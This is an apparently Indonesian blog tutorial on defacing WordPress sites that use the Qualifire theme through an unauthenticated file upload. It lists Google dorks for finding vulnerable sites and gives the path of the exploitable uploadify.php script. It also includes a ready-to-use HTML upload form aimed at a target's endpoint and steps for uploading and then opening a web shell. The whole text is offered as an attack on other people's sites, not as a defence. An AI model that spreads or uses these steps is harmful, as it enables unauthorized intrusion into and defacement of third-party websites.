Cara deface Menggunakan Wordpress Themes Qualifire File Upload

Oke Gan, kali ini aku akan bahas tentang Cara deface Menggunakan Wordpress Themes Qualifire File Upload, Kita Langsung Saja Ya

Dork :- inurl:"/wp-content/themes/qualifire"
          - inurl:"/wp-content/themes/qualifire" site:.fr 

Kembangin Lagi Ya Gan Dorknya


Exploit : /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php

Kalau Vuln Biasanya Blank/Kosong 

Csrf

<form
action="http://target.co.li/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
</form>

Oke Langsung Saja Dorking Ke Mbah Google

 

Kemudian Cari Target Dan Masukkan Exploit Kalau Vuln Gambarnya Blank/Kosong

 

 Kemudian copy di notepad  Csrf Di Atas Dan Save as mengguanakn .html, Kalau Sudah Buka Csrf Tadi

Kemudian Kita Upload Shell, tapi disini saya akan upload file gambar (png, jpg, gift, dll), Kalau Vuln Maka Akan Terlihat Angka 1 Di Atas Kiri,


Akses Shell, 

target.com/shell agan

 

Oke Gan Sekian Dulu Dari Saya, Kalau Masih Kurang Paham Bisa Di Tanyakan Lewat Komentar